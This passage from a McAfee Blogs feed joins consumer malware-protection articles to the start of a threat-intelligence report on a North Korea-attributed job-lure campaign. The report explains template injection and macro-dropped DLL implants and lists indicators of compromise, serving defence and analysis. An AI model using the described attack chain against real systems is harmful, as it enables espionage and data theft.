Apple disabled macro support in its early versions of Office for Mac, but it recently allowed macros to be supported in its later versions of both Word and Excel. But Mac users still have some protection against macros viruses since Apple doesn’t allow macros to be automatically enabled by default.

MShelper

MShelper is a cryptocurrency mining malware that allows a hacker to help himself to your computer’s processing capabilities in order to steal cryptocurrency. Hackers also develop this malware to display advertisements on the screens of popular browsers such as Mozilla, Chrome, and Firefox. Cybersecurity experts contend that MShelper infects computers when users download files of dubious origins. Some signs that your computer has been infected by MShelper include lowered battery life, fast-spinning fans, overheating, and increased noise.

Since crypto mining software takes a great deal of CPU power, it’s not hard to spot if MShelper is on your Mac. Click on the CPU tab under Activity Monitor on your computer. If MShelper has infected your MacBook, it’ll show up at the top of the list of applications with an extremely high CPU usage.

OSX/MaMi

OSX/MaMi is malware that allows hackers to capture sensitive information by redirecting data traffic through malicious servers. Through OSX/MaMi, hackers hijack Domain Name System (DNS) servers and change the DNS settings on your Mac. This malware allows attackers to perform many harmful tasks such as stealing login credentials, uploading and downloading files, and spying on your internet traffic.

While OSX/MaMi is nearly undetectable, experts say that it’s not yet been used to target Mac users on a widespread basis. Victims of this malware encounter it through targeted email phishing scams. A sign that your Mac has been infected by OSX/MaMi is a change in its DNS settings. A MacBook infected with this malware often shows these two addresses: 82.163.143.135 and 82.163.142.137.

Tips for Safeguarding Macs Against Malware

While Apple does an amazing job of guarding Macs against common security threats, it just can’t stop every determined hacker who looks at its devices as a challenge.

Here are some top tips for shoring up security for your Mac:

  • Avoid opening spam emails and attachments.
  • Don’t download questionable files.
  • Install ad-blocking applications.
  • Create frequent system backups (Time Machine).
  • Install the latest OS and application updates.
  • Manage data.
  • Install a security suite (Antivirus, firewall, browser destination monitoring).
  • User VPN software when connected to public or untrusted networks.

Stay protected

Subscribing to a comprehensive security suite service is one of the most effective steps that you can take to safeguard your Apple devices, financial information, and privacy while online. McAfee partners with industry, IT experts, and the user community to deliver the most powerful cybersecurity solutions on the market.

Check more information about our latest security products.

 

 

 

References

  • https://www.macworld.co.uk/feature/mac-software/mac-viruses-list-3668354/
  • https://macpaw.com/how-to/known-mac-viruses-malware-security-flaws
  • http://factmyth.com/factoids/apple-macs-cant-get-viruses-or-malware/
  • https://www.businessinsider.com/apple-mac-vs-windows-pc-why-i-chose-macbook-2018-3?op=1
  • https://www.iphonelife.com/content/can-iphones-get-viruses-how-to-detect-remove-malware-viruses-your-iphone
  • https://gigaom.com/2005/06/24/viruses-on-mac-os-x/
  • https://www.businessinsider.com/how-to-get-rid-of-virus-on-mac?op=1
  • https://www.computerhope.com/issues/ch000737.htm
  • https://www.digitaltrends.com/computing/does-your-mac-need-antivirus/
  • https://www.macworld.co.uk/feature/mac/security-firewall-3643100/
  • https://www.enigmasoftware.com/cookieminer-removal/
  • https://macdailynews.com/2019/01/31/new-cookieminer-macos-malware-swipes-your-cookies-to-steal-your-cryptocurrency/
  • https://9to5mac.com/2019/01/31/cookieminer/
  • https://www.pcrisk.com/removal-guides/14414-cookieminer-malware-mac
  • https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/
  • https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/
  • https://www.howtogeek.com/171993/macros-explained-why-microsoft-office-files-can-be-dangerous/
  • https://www.myantispyware.com/2018/05/18/how-to-remove-mshelper-malware-from-mac-virus-removal-guide/
  • https://lifehacker.com/how-to-deal-with-mshelper-the-latest-mac-malware-1826142837

The post Can Macs get Viruses? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/can-macs-get-viruses/feed/ 0
Understanding Trojan Viruses and How to Get Rid of Them https://www.mcafee.com/blogs/consumer/understanding-trojan-viruses-and-how-to-get-rid-of-them/ https://www.mcafee.com/blogs/consumer/understanding-trojan-viruses-and-how-to-get-rid-of-them/#respond Thu, 30 Jul 2020 15:20:59 +0000 /blogs/?p=104031 Working from home

Understanding Trojan Viruses and How to Get Rid of Them Basic online scenario—You log onto your computer and notice that something’s just not right, but you can’t quite put your finger on it. Something just seems…a bit off. If you’ve found yourself in this situation, or even thinking you are, there’s a real possibility you […]

The post Understanding Trojan Viruses and How to Get Rid of Them appeared first on McAfee Blogs.

]]>
Working from home

Understanding Trojan Viruses and How to Get Rid of Them

Basic online scenario—You log onto your computer and notice that something’s just not right, but you can’t quite put your finger on it. Something just seems…a bit off. If you’ve found yourself in this situation, or even thinking you are, there’s a real possibility you could have a Trojan virus on your computer.

Trojan viruses can not only steal your most personal information, they also put you at risk for identity theft and other serious cybercrimes. In this post, we’ll examine what Trojan viruses are, and where they come from. We’ll also cover how you can protect yourself and get rid of viruses so you can stay safe and maintain peace of mind online.

What Trojan Viruses Do

Trojan viruses are a type of malware that invade your computer disguised as a real, operational programs. Once a trojan is inside your system, it can perform destructive actions before you even know it’s there. Once inside, some trojans sit idly on your computer and wait for further instructions from its host hacker, but others begin their malicious activity right from the start.

Some trojans download additional malware onto your computer and then bypass your security settings while others try to actively disable your antivirus software. Some Trojans hijack your computer and make it part of a criminal DDoS (Distributed Denial of Service) network.

How to Remove a Trojan Virus

Before you discover all the places a Trojan can invade your computer, let’s first learn how to get rid of them. You can remove some Trojans by disabling startup items on your computer which don’t come from trusted sources. For the best results, first reboot your device into safe mode so that the virus can’t stop you from removing it.

Please carefully ensure you know which specific programs you’re removing because you could slow, disable or cripple your system if you remove basic programs your computer needs to function. Installing and using a trusted antivirus solution is also one of the top ways to get rid of trojans. An effective antivirus program searches for valid trust and app behavior, as well as trojan signatures in files in order to detect, isolate and then promptly remove them. In addition to spotting known trojans, the McAfee antivirus program can identify new trojans by detecting suspicious activity inside any and all of your applications.

Where Trojan Viruses Come From

This section takes a closer look at the places you are the most vulnerable to a Trojan virus attack. While all trojans look like normal programs, they need a way to get your attention before you unknowingly install them on your system. Trojan viruses are different from other types of malware because they trick you into installing them yourself. You will think that the Trojan is a game or music file, and the file you download will likely work like normal so that you don’t know it’s a Trojan. But it will also install the harmful virus on your computer in the background. Be careful when you get files from the following sources. Many users install trojans from file-sharing websites and fake email attachments. You can also get attacked from spoofed chat messages, infected websites, hacked networks and more.

File-Sharing Sites

Almost everyone who is at least a little tech savvy occasionally uses file-sharing websites. File-sharing websites include torrent websites and other sites that allow users to share their files, and this concept is appealing for a variety of reasons. First, it allows people to get premium software without paying the retail price. The problem though, is that file-sharing sites are also extremely attractive to hackers who want to find an easy way inside your system.

For example, a hacker uploads a cracked copy of a popular software to a torrent website for free download, then waits for potential victims to instantly download it… but the cracked software has a hidden trojan virus that allows the hacker to control your computer.

Trojan viruses can also come in the popular forms of music files, games and numerous other  applications.

Email Attachments

Fake email attachments are another common way people find themselves infected with trojan viruses. For example, a hacker sends you an email with an attachment, hoping you’ll instantly click on it, so that you become infected instantly upon opening it. Many hackers send generic emails to as many people as possible. Others go after specific people or businesses which they’ve targeted.

In targeted cases, a hacker sends a fake email that looks as if it came from someone you know. The email could contain a Word document or something you consider “safe”, but the virus infects your computer the second you open the attachment. The easiest way to protect yourself from this targeted attack is by calling the sender—before opening the attachment—to make sure they’re the one who sent this specific attachment.

Spoofed Messages

A countless number of popular programs and useful applications allow you to chat with others from your desktop. Bur regardless of if you use such software for business or personal connections, you are at risk of trojan infection unless you know how to protect yourself.

Hackers “spoof” a message so that it looks like it came from someone you trust. In addition to spoofing, hackers also create similar usernames and hope you don’t notice, or aren’t paying attention to, the slight differences. Like with fake emails, the hacker is sending you a trojan-infected file or application.

Infected Websites

Many hackers target websites instead of individual users. They find weaknesses in unsecured websites which allow them to upload files or, in some cases, even take over the entire website. When this type of site hijacking happens, the hacker can then use the website to redirect you to other sites.

The hacker can compromise the entire website and redirect your downloads to a malicious server that contains the trojan. Using only trusted, well-known websites is one way to reduce your odds of falling into that trap, but a good antivirus program can also help detect infected and hacked sites.

Hacked Wi-Fi Networks

Hacked Wi-Fi networks are also a common source of trojans and other malware. A hacker can create a fake “hotspot” network that looks exactly like the one you’re trying to connect to. When you connect to this fake network by mistake, however, the hacker can then redirect you to fake websites that look so real that even experts have trouble spotting the difference. These fake websites contain browser exploits that redirect any file you try downloading.

Final Thoughts

Trojans can infect your computer and cause enormous problems before you even know what happened. Once a trojan gets onto your system, it can monitor your keyboard, install additional malware and cause a variety of other problems you simply don’t want to face. Luckily, most Trojans are generic and easy to handle if you follow this proven process.

Unverified startup items and suspicious programs can act as gateways for trojans to install harmful code in your computer and other devices. If you notice any new programs running on your system that you did not install, it could be a trojan. Try removing the program and restarting your computer to see if your computer’s performance improves.

Remove Trojans by taking the following steps:

Removing Trojans is a great way to safeguard your computer and privacy, but you must also take steps to avoid them in the future:

  • Setup cloud accounts using email addresses that offers account recovery support. Accounts from ISP’s or paid services.
  • In the case of Apple, you can request assistance to help recover an account (Gmail and/or yahoo accounts can’t be recovered as they can’t confirm ownership)
  • Use VPNs on Public Wi-Fi
  • Call the Sender Before Opening Email Attachments
  • Use an Antivirus Solution With Real-Time Protection

Stay protected

The cyberthreat landscape is always changing and evolving. Hackers are always looking for new ways to break into computers and servers, so you must stay updated on the latest threats, and using a proven antivirus solution is always a smart bet. These steps will not only safeguard your devices, they’ll also give you peace of mind while online.

The post Understanding Trojan Viruses and How to Get Rid of Them appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/understanding-trojan-viruses-and-how-to-get-rid-of-them/feed/ 0
How to Wipe Out a Computer Virus https://www.mcafee.com/blogs/consumer/how-to-wipe-out-a-computer-virus/ https://www.mcafee.com/blogs/consumer/how-to-wipe-out-a-computer-virus/#respond Thu, 30 Jul 2020 15:20:50 +0000 /blogs/?p=104052

How to Wipe Out a Computer Virus In this article, you’ll learn some of the signs that you may have a computer virus, and you’ll learn tips for effectively removing them. While some of these malicious programs are little more than a nuisance, many others can effectively steal your most personal, private and sensitive  information. […]

The post How to Wipe Out a Computer Virus appeared first on McAfee Blogs.

]]>

How to Wipe Out a Computer Virus

In this article, you’ll learn some of the signs that you may have a computer virus, and you’ll learn tips for effectively removing them. While some of these malicious programs are little more than a nuisance, many others can effectively steal your most personal, private and sensitive  information. In this article, you’ll learn some of the signs that you may have a computer virus, and you’ll learn tips for effectively removing them.

What is a computer virus?

First off, computer viruses can take many different forms. In general terms, these viral programs are any unwanted bit of code designed for the purpose of invading and disrupting your computer. But much like a biological virus, computer viruses invade, replicate themselves, and then try to get into other systems. Some viruses may only affect your internet browser. Others  are even more harmful. The rootkit virus type, however, digs deep into the internal controls of your system. Trojan viruses sneak onto your device disguised as programs that seem legitimate.

Signs of a Virus

A sudden slowdown may be the first sign that you have a virus, and you may notice that programs which used to load quickly take longer and longer to load. You may also receive multiple error messages about programs becoming unresponsive. In this case, the virus is using the processing power of your own computer system, and consequently other programs are having trouble running at the same time.

Some viruses and malware only affect certain parts of your system. For example, you could discover that the home page of your browser has changed without your knowledge. You may also have trouble logging onto antivirus and antimalware sites, or if/when a virus gets into your email program, you may start to hear from your contacts about strange emails coming from your computer.

How does a virus get on your computer?

Computer viruses have been around for about as long as personal computers, and virus programmers understand that human error is always the easiest way to install a virus. Therefore, while strong antivirus programs can effectively prevent most computerized threats, they cannot stop a user from clicking the wrong link or installing compromised software on  their own system. When you download programs or data from an unfamiliar site, remember that you may also be unknowingly accepting a viral program onto your system. Links in malicious emails can also start an automatic download.

And new viruses come online all the time. The experts at McAfee are constantly learning about new malicious programs and then developing solutions. If however, you do not regularly update your virus definitions, a harmful program may still be able to sneak by your defensive software.

Removing a Computer Virus

Removing a computer virus manually is a complex process. Viruses may install themselves in several different parts of your system. If you do not completely eliminate the program, it may also reinstall itself at the next system reboot. In some cases, viruses play nasty tricks like invading the registry of a Windows system. Removing the wrong line in this database can then cause the entire system to fail. The easiest way to remove viruses is by using an antivirus program designed to clean your system safely. If a virus is already on your computer, however, you may need to run this program under very specific conditions.

Remove New Programs

If you’re lucky, the virus may just be sitting in a program you recently installed. On both Windows and Mac, you will want to uninstall recent apps and then remove new browser extensions. If you remove these programs and your computer promptly runs smoothly, you can breathe a sigh of relief. Of course you should still run a virus scan to make certain that your system is clean. You will also want to restart the computer to determine whether the malicious program reinstalls itself. If malicious messages pop up from the same program again, it points to a deeper infection.

Removing a Virus from a Windows Computer

In Windows computers, the virus removal process begins by booting up the computer in Safe mode. In this mode, your computer starts with only essential programs running. This prevents a viral program from starting up and blocking your antiviral scans. In older versions of Windows, you can access this mode by pressing the F8 button during the startup process.

In Windows 10, the process of opening in Safe mode is slightly more involved:

  1. Press the Windows button and click on Settings.
  2. Go to Update & Security and choose Recovery.
  3. Choose Restart Now under Advanced Startup.
    Your system will restart, but a new option screen will appear.
  4. Choose Troubleshoot.
  5. Go to Advanced Options and choose Startup Settings.
  6. Choose Enable Safe Mode.

Once your system restarts in safe mode, you will be able to run an on-demand viral scan. Because the number of viruses is always increasing, you may find it helpful to run several different scanning programs to catch any newer virus. It is important to use antiviral programs from reputable vendors so that you do not make the problem worse.

You should also follow these best practices:

• Backup your critical data
• Clean up temporary files and cached content
• Uninstall any/all applications no longer in use
• Update OS and remaining applications
• Check startup apps, disable unneeded apps
• Run the MMC (see above)
• Run a full Scan of the system

Removing a Virus from a Mac

For Mac computers, entering Safe mode is an even simpler process.

All you need to do is hold the shift button while the system boots up. If you’ve done this properly, you will see a “Safe Boot” message (Apple support content HT201262) on the login window. From there, you’ll run your virus removal programs and clean your system.  For both Windows computers and Macs, you will want to run your virus scan multiple times to assure that the system is clean.

Seek Professional Help

If you’ve gone through this process but are still struggling with a virus, you may need to call in a professional to clean your computer. For example, with McAfee Virus Removal Service, a security expert can remove stubborn viruses from your computer using a remote connection.

Avoiding Computer Viruses

The easiest way to remove computer viruses from your life is to avoid them in the first place.

It is vitally important to keep your system secure by following safe, Best Practices:

• Maintain backups of your data
• Clean up temporary files and cached content
• Uninstall application no longer used
• Update OS and remaining applications
• Check startup apps, disable unneeded apps
• Verify Security subscription status
• Confirm Security software is up to date.
• Use trusted sources: Do not download software from a source you do not recognize. Do not run unsolicited programs.

And always Surf Safely using these tips:

• Use the WebAdvisor browser extension.
• Use VPN software while using untrusted networks.
• Use a password manager.
• Refrain from using the same usernames and password for web pages especially financial or shopping sites.
• Setup cloud accounts using email addresses that offer account recovery support, accounts from ISP’s or paid services.
• With Apple, you can request account recovery assistance (Gmail or yahoo accounts can’t be recovered as they can’t confirm ownership).

Stay Protected

Professional security software is always a smart long-term investment in your computer system. You can keep both your data and identity safe while maintaining system performance. With the right program running in the background, your system will be ready to handle any and all of the threats inside your digital world.

The post How to Wipe Out a Computer Virus appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/how-to-wipe-out-a-computer-virus/feed/ 0
Is Your Smart Home Vulnerable to a Hack Attack? https://www.mcafee.com/blogs/consumer/is-your-smart-home-vulnerable-to-a-hack-attack/ https://www.mcafee.com/blogs/consumer/is-your-smart-home-vulnerable-to-a-hack-attack/#respond Thu, 30 Jul 2020 15:20:47 +0000 /blogs/?p=104064

Is Your Smart Home Vulnerable to a Hack Attack? Your smart home device creates a computer network which can function as your incredibly convenient garage door opener, appliance manager, lighting designer, In-House DJ, and even security system supervisor, among many other selected duties. Yet cybersecurity experts frequently caution that this ultra-convenient home network provided through […]

The post Is Your Smart Home Vulnerable to a Hack Attack? appeared first on McAfee Blogs.

]]>

Is Your Smart Home Vulnerable to a Hack Attack?

Your smart home device creates a computer network which can function as your incredibly convenient garage door opener, appliance manager, lighting designer, In-House DJ, and even security system supervisor, among many other selected duties. Yet cybersecurity experts frequently caution that this ultra-convenient home network provided through your smart devices may be vulnerable to malicious hackers looking to gain access to your home, and your most private information. In addition, the considers hacking of your smart devices as a backdoor to your most important information.

So while this is certainly an unfortunately real possibility, taking the time to use a few tips in this article can go a long way to stopping hackers before they start, and keeping your smart home devices safe and secure.

Can smart home devices be hacked?

The short answer is, unfortunately, yes. Along with the widespread popularity of smart home devices, a recent trend in hackers using IoT technology to spy on businesses, launch attacks, and deliver malware to your home network is a modern reality that users need to be fully aware of when setting up their smart home systems.

What can I expect if my smart devices get hacked?

With a physical home break-in, alert neighbors may notice and call the police, but a hacker has the advantage of working in secret. With access to your private information, savvy hackers may be able to steal sensitive information, or — in a worst case scenario — commit identity theft that can cause financial fallout. When you consider the array of smart toys and gadgets that provide electronic entertainment, education, communication and convenience for your family, you may also discover a number of vulnerabilities that hackers can exploit to break-in to your home.

Where do the biggest home threats exist?

Because of their 24/7 potential access, smart devices which you run continuously—thermostat, lighting, security, et al. — may pose more risk than those which you only use on occasion. Hack attacks on your home office computer, or router are likely the most vulnerable, but your living and bedroom may also contain any number of smart gadgets that a sharp hacker may attempt to exploit as well. Your smart TV, tablet, cell phones, alarm clocks, watches, sleep monitors and streaming gadgets can also make your bedroom a relatively open opportunity for hackers.

Both your living room and kitchen—smart TV’s, tablets, refrigerators, coffee machines, ovens, etc. — also offer connections which are easy to ignore when it comes to cybersecurity. And when assessing potential threats, do not neglect your children’s playroom with its smart toys, tablets or baby monitors. Be sharp and consider that any smart device can offer an opening.

Does hacking pose a severe threat?

Short answer? It does. The potential risk should reasonably grab your attention when you understand that all your smart devices have a direct connection to your smartphone, or even the internet. Awareness of this situation should sharpen your understanding of exactly how much effort goes into hacking attempts to break into the interconnected network that links your smart devices.

Does a password protect my smart devices from hacking?

The Cybersecurity and Infrastructure Security Agency (CISA) offers specific guidelines on the best ways to protect your identity and possessions from the intrusive and persistent efforts of hackers. The guidelines apply to devices that connect to each other and to the internet, providing stringent guidance.

As a savvy computer user, you probably know that each device has a factory default password. What you may not know, however, is that you must change this default password. Always take the time to change default passwords, and make sure to create long, unique passwords that can best defeat any efforts to crack them.

What are some practical things I can do to secure my smart devices?

Remember that while it may take some extra effort to create a second Wi-Fi network dedicated to your smart devices, this effort will provide significant benefits. You can help confine any network intrusions to a separate network that does not have access to your bank, or private, sensitive financial information. And these simple steps can also make a significant difference in protecting your smart home systems:

  • Thoroughly research the device brand then choose one that has a proven security track record.
  • Keep the product software up-to-date. Always set your device to auto-update if possible so you always run the latest, safest software.
  • Most every device will come with a factory default password. Remember to take the time to go in and create a long and unique password for each device.
  • Choose the privacy settings that you’re comfortable with, instead of the blanket permissions that come with the devices.
  • Unplug any/every smart gadget when not in use.
  • Install cloud-integrated antivirus software for your router that protects every electronic device in your home.

Stay protected

When you actively participate in creating your home’s security profile, you take ownership that generates interest, knowledge, and ultimately, security. Stay a step ahead by staying informed, and your smart home can remain a smart choice!

The post Is Your Smart Home Vulnerable to a Hack Attack? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/is-your-smart-home-vulnerable-to-a-hack-attack/feed/ 0
Operation (노스 스타) North Star A Job Offer That’s Too Good to be True? https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/#respond Thu, 30 Jul 2020 04:14:38 +0000 /blogs/?p=103224

Executive Summary We are in the midst of an economic slump [1], with more candidates than there are jobs, something that has been leveraged by malicious actors to lure unwitting victims into opening documents laden with malware. While the prevalence of attacks during this unprecedented time has been largely carried out by low-level fraudsters, the […]

The post Operation (노스 스타) North Star A Job Offer That’s Too Good to be True? appeared first on McAfee Blogs.

]]>

Executive Summary

We are in the midst of an economic slump [1], with more candidates than there are jobs, something that has been leveraged by malicious actors to lure unwitting victims into opening documents laden with malware. While the prevalence of attacks during this unprecedented time has been largely carried out by low-level fraudsters, the more capable threat actors have also used this crisis as an opportunity to hide in plain sight.

One such example is a campaign that McAfee Advanced Threat Research (ATR) observed as an increase in malicious cyber activity targeting the Aerospace & Defense industry. In this 2020 campaign McAfee ATR discovered a series of malicious documents containing job postings taken from leading defense contractors to be used as lures, in a very targeted fashion. These malicious documents were intended to be sent to victims in order to install a data gathering implant. The victimology of these campaigns is not clear at this time, however based on the job descriptions, they appear to be targeting people with skills and experience relating to the content in the lure documents. The campaign appears to be similar to activity reported elsewhere by the industry, however upon further analysis the implants and lure documents in this campaign are distinctly different [2], thus we can conclude this research is part of a different activity set. This campaign is utilizing compromised infrastructure from multiple European countries to host its command and control infrastructure and distribute implants to the victims it targets.

This type of campaign has appeared before in 2017 and 2019 using similar methods with the goal of gathering intelligence surrounding key military and defense technologies [3]. The 2017 campaign also used lure documents with job postings from leading defense contractors; this operation was targeting individuals employed by defense contractors used in the lures. Based on some of the insight gained from spear phishing emails, the mission of that campaign was to gather data around certain projects being developed by their employers.

The Techniques, Tactics and Procedures (TTPs) of the 2020 activity are very similar to those previous campaigns operating under the same modus operandi that we observed in 2017 and 2019. From our analysis, this appears a continuation of the 2019 campaign, given numerous similarities observed. These similarities are present in both the Visual Basic code used to execute the implant and some of the core functionality that exists between the 2019 and 2020 implants.

Thus, the indicators from the 2020 campaign point to previous activity from 2017 and 2019 that was previously attributed to the threat actor group known as Hidden Cobra [4]. Hidden Cobra is an umbrella term used to refer to threat groups attributed to North Korea by the U.S Government [1]. Hidden Cobra consists of threat activity from groups the industry labels as Lazarus, Kimsuky, KONNI and APT37. The cyber offensive programs attributed to these groups, targeting organizations around the world, have been documented for years. Their goals have ranged from gathering data around military technologies to crypto currency theft from leading exchanges.

Our analysis indicates that one of the purposes of the activity in 2020 was to install data gathering implants on victims’ machines. These DLL implants were intended to gather basic information from the victims’ machines with the purpose of victim identification. The data collected from the target machine could be useful in classifying the value of the target. McAfee ATR noticed several different types of implants were used by the adversary in the 2020 campaigns.

These campaigns impact the security of South Korea and foreign nations with malicious cyber campaigns. In this blog McAfee ATR analyzes multiple campaigns conducted in the first part of 2020.

Finally, we see the adversary expanding the false job recruitment campaign to other sectors outside of defense and aerospace, such as a document masquerading as a finance position for a leading animation studio.

In this blog we will cover:

Target of Interest – Defense & Aerospace Campaign

This is not the first time that we have observed threat actors using the defense and aerospace industry as lures in malicious documents. In 2017 and 2019, there were efforts to send malicious documents to targets that contained job postings for positions at leading defense contractors3

The objective of these campaigns was to gather information on specific programs and technologies. Like the 2017 campaign, the 2020 campaign also utilized legitimate job postings from several leading defense and aerospace organizations. In the 2020 campaign that McAfee ATR observed, some of the same defense contractors from the 2017 operation were again used as lures in malicious documents.

This new activity noted in 2020 uses similar Techniques, Tactics and Procedures (TTPs) to those seen in a 2017 campaign that targeted individuals in the Defense Industrial Base (DIB). The 2017 activity was included in an indictment by the US government and attributed to the Hidden Cobra threat group4

Attack Overview

 

Phase One: Initial Contact

This recent campaign used malicious documents to install malware on the targeted system using a template injection attack. This technique allows a weaponized document to download an external Word template containing macros that will be executed. This is a known trick used to bypass static malicious document analysis, as well as detection, as the macros are embedded in the downloaded template.

Further, these malicious Word documents contained content related to legitimate jobs at these leading defense contractors. All three organizations have active defense contracts of varying size and scope with the US government.

The timeline for these documents, that were sent to an unknown number of targets, ran between 31 March and 18 May 2020.

Document creation timeline

Malign documents were the main entry point for introducing malicious code into the victim’s environment. These documents contained job descriptions from defense, aerospace and other sectors as a lure. The objective would be to send these documents to a victim’s email with the intention they open, view and ultimately execute the payload.

As we mentioned, the adversary used a technique called template injection. When a document contains the .docx extension, in our case, it means that we are dealing with the Open Office XML standard. A .docx file is a zip file containing multiple parts. Using the template injection technique, the adversary puts a link towards the template file in one of the .XML files, for example the link is in settings.xml.rels while the external oleobject load is in document.xml.rels. The link will load a template file (DOTM) from a remote server. This is a clever technique we observe being used by multiple adversaries [5] and is intended to make a document appear to be clean initially, only to subsequently load malware. Some of these template files are renamed as JPEG files when hosted on a remote server to avoid any suspicion and bypass detection. These template files contain Visual Basic macro code, that will load a DLL implant onto the victim’s system. Current McAfee technologies currently protect against this threat.

We mentioned earlier that docx files (like xlsx and pptx) are part of the OOXML standard. The document defining this standard[6], describes the syntax and values that can be used as an  example. An interesting file to look at is the ‘settings.xml’ file that can be discovered in the ‘Word’ container of the docx zip file. This file contains settings with regards to language, markup and more. First, we extracted all the data from the settings.xml files and started to compare. All the documents below contained the same language values:

w:val=”en-US”
w:eastAsia=”ko-KR”

The XML file ends with a GUID value that starts with the value “w15”.

Example: w15:val=”{932E534D-8C12-4996-B261-816995D50C69}”/></w:settings>

According to the Microsoft documentation, w15 defines the PersistentDocumentId Class. When the object is serialized out as xml, its qualified name is w15:docId. The 128-bit GUID is set as an ST_Guid attribute which, according to the Microsoft documentation, refers to a unique token. The used class generates a GUID for use as the DocID and generates the associated key. The client stores the GUID in that structure and persists in the doc file. If, for example, we would create a document and would “Save As”, the w15:docId GUID would persist across to the newly created document. What would that mean for our list above? Documents with the same GUID value need to be placed in chronological order and then we can state the earliest document is the root for the rest, for example:

What we can say from above table is that ‘_IFG_536R.docx” was the first document we observed and that later documents with the same docID value were created from the same base document.

To add to this assertion; in the settings.xml file the value “rsid” (Revision Identifier for Style Definition) can be found. According to Microsoft’s documentation: “This element specifies a unique four-digit number which shall be used to determine the editing session in which this style definition was last modified. This value shall follow this following constraint: All document elements which specify the same rsid* values shall correspond to changes made during the same editing session. An editing session is defined as the period of editing which takes place between any two subsequent save actions.”

Let’s start with the rsid element values from “*_IFG_536R.docx”:

And compare with the rsid element values from “*_PMS.docx”:

The rsid elements are identical for the first four editing sessions for both documents. This indicates that these documents, although they are now separate, originated from the same document.

Digging into more values and metadata (we are aware they can be manipulated), we created the following overview in chronological order based on the creation date:

When we zoom in on the DocID “932E534d(..) we read the value of a template file in the XML code: “Single spaced (blank).dotx” – this template name seems to be used by multiple “Author” names. The revision number indicates the possible changes in the document.

Note: the documents in the table with “No DocID” were the “dotm” files containing the macros/payload.

All files were created with Word 2016 and had both the English and Korean languages installed. This analysis into the metadata indicates that there is a high confidence that the malicious documents were created from a common root document.

Document Templates

There were several documents flagged as non-malicious discovered during our investigation. At first glance they did not seem important or related at all, but deeper investigation revealed how they were connected. These documents played a role in building the final malicious documents that ultimately got sent to the victims. Further analysis of these documents, based on metadata information, indicated that they contained relationships to the primary documents created by the adversary.

Two PDF files (***_SPE_LEOS and ***_HPC_SE) with aerospace & defense industry themed images, created via the Microsoft Print to PDF service, were submitted along with ***_ECS_EPM.docx. The naming convention of these PDF files was very similar to the malicious documents used. The name includes abbreviations for positions at the defense contractor much like the malicious documents. The Microsoft Print to PDF service enables content from a Microsoft Word document be printed to PDF directly. In this case these two PDF files were generated from an original Microsoft Word document with the author ‘HOME’. The author ‘HOME’ appeared in multiple malicious documents containing job descriptions related to aerospace, defense and the entertainment industry. The PDFs were discovered in an archive file indicating that LinkedIn may have been a possible vector utilized by the adversaries to target victims. This is a similar vector as to what has been observed in a campaign reported by industry[7], however as mentioned earlier the research covered in this blog is part of a different activity set.

Metadata from PDF file submitted with ***_ECS_EPM.docx in archive with context fake LinkedIn

Visual Basic Macro Code

Digging into the remote template files reveals some additional insight concerning the structure of the macro code. The second stage remote document template files contain Visual Basic macro code designed to extract a double base64 encoded DLL implant. The content is all encoded in UserForm1 in the remote DOTM file that is extracted by the macro code.

Macro code (17.dotm) for extracting embedded DLL

Further, the code will also extract the embedded decoy document (a clean document containing the job description) to display to the victim.

Code (17.dotm) to extract clean decoy document

Macro code (******_dds_log.jpg) executed upon auto execution

Phase Two: Dropping Malicious DLLs

The adversary used malicious DLL files, delivered through stage 2 malicious documents, to spy on targets. Those malicious documents were designed to drop DLL implants on the victim’s machine to collect initial intelligence. In this campaign the adversary was utilizing patched SQL Lite DLLs to gather basic information from its targets. These DLLs were modified to include malicious code to be executed on the victim’s machine when they’re invoked under certain circumstances. The purpose of these DLLs is/was to gather machine information from infected victims that could be used to further identify more interesting targets.

The first stage document sent to targeted victims contained an embedded link that downloaded the remote document template.

Embedded link contained within Word/_rels/settings.xml.rels

The DOTM (Office template filetype) files are responsible for loading the patched DLLs onto the victim’s machine to collect and gather data. These DOTM files are created with DLL files  encoded directly into the structure of the file. These DOTM files exist on remote servers compromised by the adversary; the first stage document contains an embedded link that refers to the location of this file. When the victim opens the document, the remote DOTM file that contains a Visual Basic macro code to load malicious DLLs, is loaded. Based on our analysis, these DLLs were first seen on 20 April 2020 and, to our knowledge based on age and prevalence data, these implants have been customized for this attack.

The workflow of the attack can be represented by the following image:

To identify the malicious DLLs that will load or download the final implant, we extracted from the Office files found in the triage phase, the following DLL files:

SHA256 Original File name Compile Date
bff4d04caeaf8472283906765df34421d657bd631f5562c902e82a3a0177d114

 

wsuser.db 4/24/2020
b76b6bbda8703fa801898f843692ec1968e4b0c90dfae9764404c1a54abf650b

 

unknown 4/24/2020
37a3c01bb5eaf7ecbcfbfde1aab848956d782bb84445384c961edebe8d0e9969

 

onenote.db 4/01/2020
48b8486979973656a15ca902b7bb973ee5cde9a59e2f3da53c86102d48d7dad8 onenote.db 4/01/2020
 bff4d04caeaf8472283906765df34421d657bd631f5562c902e82a3a0177d114

 

wsuser.db 4/24/2020

These DLL files are patched versions from goodware libraries, like the SQLITE library found in our analysis, and are loaded via a VBScript contained within the DOTM files that loads a double Base64 encoded DLL as described in this analysis. The DLL is encoded in UserForm1 (contained within the Microsoft Word macro) and the primary macro code is responsible for extracting and decoded the DLL implant.

DOTM Document Structure

Implant DLLs encoded in UserForm1

From our analysis, we could verify how the DLLs used in the third stage were legitimate software with a malicious implant inside that would be enabled every time a specific function was called with a set of parameters.

Analyzing the sample statically, it was possible to extract the legitimate software used to store the implant, for example, one of the DLL files extracted from the DOTM files was a patched SQLITE library. If we compare the original library within the extracted DLL, we can spot lot of similarities across the two samples:

Legitimate library to the left, malicious library to the right

As mentioned, the patched DLL and the original SQLITE library share a lot of code:

Both DLLs share a lot of code internally

The first DLL stage needs certain parameters in order to be enabled and launched in the system. The macro code of the Office files we analyzed, contained part of these parameters:

Information found in the pcode of the document

The data found in the VBA macro had the following details:

  • 32-bit keys that mimic a Windows SID
